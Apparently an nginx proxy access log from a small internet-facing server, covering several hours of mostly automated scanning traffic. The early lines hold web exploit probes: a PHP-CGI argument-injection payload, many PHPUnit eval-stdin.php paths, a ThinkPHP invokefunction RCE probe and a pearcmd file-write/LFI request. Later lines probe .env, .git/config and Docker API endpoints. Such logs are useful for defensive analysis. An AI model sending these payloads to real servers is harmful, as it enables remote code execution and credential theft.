[Length 154] [Gzip -] "-" "-" +[20/Jan/2026:21:54:45 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 103.232.121.71] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:21:54:45 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:46 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 103.232.121.71] [Length 154] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:46 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:47 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:47 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:48 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:48 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:49 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:49 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:49 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:50 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:50 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:51 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:51 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:52 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:52 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:53 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:53 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:54 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:54 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:55 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:56 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:56 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:56 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:57 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:57 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:58 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:58 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:59 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:54:59 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:00 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:00 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:00 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:01 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:01 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:02 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:02 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:03 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:04 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:04 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:05 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:05 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:06 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:06 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 103.232.121.71] [Length 150] [Gzip -] "libredtail-http" "-" +[20/Jan/2026:21:55:09 +0000] 400 - GET http 91.82.83.208 "/" [Client 172.202.118.72] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[20/Jan/2026:21:55:09 +0000] 400 - - http localhost "-" [Client 172.202.118.72] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:21:57:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:22:03:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[20/Jan/2026:22:07:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:22:08:53 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 45.156.87.161] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[20/Jan/2026:22:12:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:22:21:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.37] [Length 1033] [Gzip -] "-" "-" +[20/Jan/2026:22:23:23 +0000] 400 - GET http profibot.direct.quickconnect.to "/" [Client 167.94.138.37] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:22:23:27 +0000] 400 - - http localhost "-" [Client 167.94.138.37] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:22:25:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:22:31:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 114.35.104.200] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.1" "-" +[20/Jan/2026:22:40:24 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:22:41:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.33] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:22:41:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.33] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:22:41:19 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.33] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:22:42:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:22:47:17 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[20/Jan/2026:22:49:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:22:54:24 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.153.71.132] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[20/Jan/2026:22:54:36 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:23:04:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:23:12:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:23:19:49 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:23:34:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:23:36:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:23:40:28 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:23:40:57 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:23:41:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:23:44:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 34.79.124.224] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[20/Jan/2026:23:45:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:23:45:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 66.132.153.117] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:23:45:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.132.153.117] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:23:45:53 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[20/Jan/2026:23:45:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.132.153.117] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:23:45:59 +0000] 404 - GET http 91.82.83.208 "/.well-known/security.txt" [Client 66.132.153.117] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[20/Jan/2026:23:46:00 +0000] 200 - GET http 91.82.83.208 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:23:46:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.132.153.117] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:23:52:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 193.164.205.13] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-" +[20/Jan/2026:23:55:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:23:56:41 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 157.245.196.205] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[20/Jan/2026:23:56:42 +0000] 404 - GET http 91.82.83.208 "/.git/config" [Client 157.245.196.205] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[20/Jan/2026:23:57:37 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:00:01:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:00:01:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:00:19:48 +0000] 400 - GET http 192.168.100.43 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[21/Jan/2026:00:21:58 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:00:25:53 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:00:28:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:00:35:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:00:39:37 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:00:40:29 +0000] 404 - GET http 91.82.83.208 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[21/Jan/2026:00:46:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:00:50:36 +0000] 200 - GET http 91.82.83.208 "/" [Client 103.203.57.3] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[21/Jan/2026:00:51:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.236.176.106] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" +[21/Jan/2026:00:53:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:00:54:26 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:00:56:56 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:01:12:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:01:13:57 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:01:19:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:01:24:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 185.177.72.49] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:01:25:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:01:26:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:01:27:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:01:32:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 3.137.73.221] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[21/Jan/2026:01:33:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 3.137.73.221] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[21/Jan/2026:01:33:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 98.93.83.253] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[21/Jan/2026:01:35:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.137.73.221] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:01:35:55 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.137.73.221] [Length 0] [Gzip -] "-" "-" +[21/Jan/2026:01:36:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.137.73.221] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:01:38:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.137.73.221] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:01:38:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:01:38:47 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 3.94.55.133] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:01:38:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 98.91.251.161] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" "-" +[21/Jan/2026:01:39:06 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[21/Jan/2026:01:43:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:01:53:01 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[21/Jan/2026:01:58:22 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 198.235.24.225] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[21/Jan/2026:02:00:00 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:02:05:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 151.242.144.223] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[21/Jan/2026:02:06:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 